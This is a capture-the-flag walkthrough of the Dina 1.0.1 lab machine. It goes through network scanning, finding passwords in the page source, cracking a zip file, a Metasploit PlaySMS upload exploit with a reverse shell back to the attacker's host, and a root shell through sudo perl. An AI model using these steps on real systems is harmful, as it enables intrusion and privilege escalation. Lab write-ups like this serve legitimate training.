We will be looking at how I can solved dina:1.0.1 machine. In this machine we find
flag.txt file and root privilege.
Let’s start game
Scanning the network and identifying host ip address.
netdiscover –r 10.0.2.1/24
We found the host ip address 10.0.2.7 by using netdiscover.
Used nmap for port enumeration.
Nmap –sV –A 10.0.2.7
We can see port 80 is open. We are goto browser and search the host
ip(10.0.2.7) . we did not find anything useful on webpage.
Also in the nmap scan, we found robots.txt directory , so we tried open in
Inside the robots.txt directory, we found the multiple name directories, so
we tried open each of them one by one but found /nothing directory useful
Goto the source page of the webpage. we found many password it’s use
We have got the passwords. so we used dirb to find out any directories
where we could use these password. We found a directory name /secure
and open it.
In /secure directory we found zip file backup.zip. we download the file in
our kali machine
When we tried to extract the zip file it was password-protected, so we tried
all the password but freedom was the correct one.
Now after we extract file an mp3 file. We check the file and find out it
actually an ascll file. We open it and got username and a directory /Secre
We open the directory in the browser and got a playsms login page. We
enter username touhid and password from above and Diana is correct.
We are looked for any exploit in metasploit that mach playsms.
We used the first exploit in which we are uploading our playload using a csv
set username touhid
set password diana
set targeturi /SecreTSMSgatwayLogin
After running the exploit, we successfully got a meterpreter session but
shell command will not work don’t warry you will enter ctrl + z and choose
y option. Then set payload 2 and running exploit .
set rhost 10.0.2.7
set lhost 10.0.2.15
set lport 4444
set payload 2
To elevate to root privilege we exploited the sudo permissions of perl and
successfully got root shell and found flag.txt file
sudo /usr/bin/perl -e “exec ‘/bin/bash’;”
So finally we found flag.txt file and root privilege.
Author: vipin yadav